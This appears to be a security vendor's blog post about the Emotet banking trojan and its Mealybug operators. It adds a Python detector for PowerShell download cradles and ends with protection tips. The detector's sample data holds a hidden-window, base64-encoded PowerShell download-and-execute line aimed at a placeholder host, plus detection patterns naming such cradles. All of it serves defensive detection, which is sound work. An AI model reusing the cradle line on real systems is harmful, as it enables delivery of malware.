Si Cyber Intel: Emotet – The Rise Of Banking Trojans
Back in June, Symantec uncovered activities being undertaken by the threat group known as Mealybug. The group, first identified in 2014, built and executed malware named 'Emotet' to spread banking Trojans that would steal online banking information from users based in Europe. Once on the network, Emotet can self-propagate, allowing it to spread aggressively.
Since then, Mealybug's activities have evolved somewhat: from maintaining and delivering its own banking trojan to offering that custom-built trojan to similar threat actors, taking a cut of their earnings in return. Delivered via phishing emails, the trojan lets these threat actors steal private information and download further payloads from the command-and-control server, then execute them.
The most recent version of the Emotet banking trojan adds several new modules: an email client module that lets the trojan steal email credentials; banking modules that steal the user's banking information; a browsing history and password infostealer module; a PST infostealer module that lets the trojan read through private message archives in Microsoft Outlook to steal email addresses and data; and, finally, a DDoS attack module.
Emotet can also spread the Qakbot malware, a sister banking trojan that behaves like a worm, using a Windows PowerShell script to download and harvest credentials with the increasingly popular Mimikatz malware.
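As an added defensive example (not code from the original article, from Symantec or from any vendor), the following Python detector flags the PowerShell download-and-execute behaviour described above in process-creation telemetry. The Sysmon-style event fields, the indicator regexes, the file paths and the URL are all constructed assumptions; decoding a `-EncodedCommand` argument before matching goes beyond the article, which only mentions a PowerShell download script.

```python
import base64
import re
# Constructed Sysmon Event ID 1 style samples, not real telemetry; URL and paths are placeholders.
DROPPER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
ENCODED_SCRIPT = base64.b64encode(DROPPER_SCRIPT.encode("utf-16le")).decode("ascii")
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": PS_PATH,  # hidden, encoded download cradle spawned by the mail client
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": f"powershell.exe -NoP -w hidden -enc {ENCODED_SCRIPT}"},
    {"image": PS_PATH,  # benign administrative use of PowerShell
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
]
CRADLE_PATTERNS = {  # alert label -> case-insensitive regex
    "DownloadString": r"downloadstring",
    "Invoke-WebRequest": r"invoke-webrequest|\biwr\b",
    "Net.WebClient": r"net\.webclient",
    "Invoke-Expression": r"invoke-expression|\biex\b",
}
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
MAIL_OFFICE = ("outlook.exe", "winword.exe", "excel.exe")

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (UTF-16LE base64), or None."""
    m = ENC_RE.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def assess_event(ev):
    """List the reasons a process-creation event looks like a PowerShell download cradle."""
    if not ev["image"].lower().endswith("powershell.exe"):
        return []
    reasons, text = [], ev["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded:  # match on the decoded script, not only on the base64 blob
        reasons.append("encoded command")
        text += " " + decoded
    hits = [name for name, rx in CRADLE_PATTERNS.items() if re.search(rx, text, re.I)]
    if hits:
        reasons.append("download cradle: " + ", ".join(hits))
    if HIDDEN_RE.search(text):
        reasons.append("hidden window")
    if ev["parent"].lower().endswith(MAIL_OFFICE):
        reasons.append("spawned by mail/Office client")
    return reasons
```

Running `assess_event` over each sample returns a list of reasons for the first event and an empty list for the benign second one; in practice the parent-process and hidden-window signals are what separate a phishing-delivered dropper from routine administrative PowerShell.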
How to protect yourself:
Banking trojans are on the rise, with new threats uncovered daily. To avoid becoming the victim of a banking trojan, we recommend the following:
- Enforce two-factor authentication (2FA). This two-step verification, also known as "multi-factor authentication", is an extra layer of security that requires not only a username and password but also something that only you know
- Make sure internet routers at home and in the office are updated with recent patches and security updates
- Verify that the websites you are redirected to have HTTPS enabled and are encrypted with trusted certificates
- Avoid installing mobile applications from unknown sources. By default, Google prevents users from installing apps from sources other than the Play Store. We recommend that you leave the installation of apps from unknown sources disabled
- Avoid opening links received via SMS, WhatsApp or other messaging applications from unknown sources
- Avoid downloading third-party applications or responding to suspicious messages
For information about Si Cyber’s malware detection and response capabilities, please contact firstname.lastname@example.org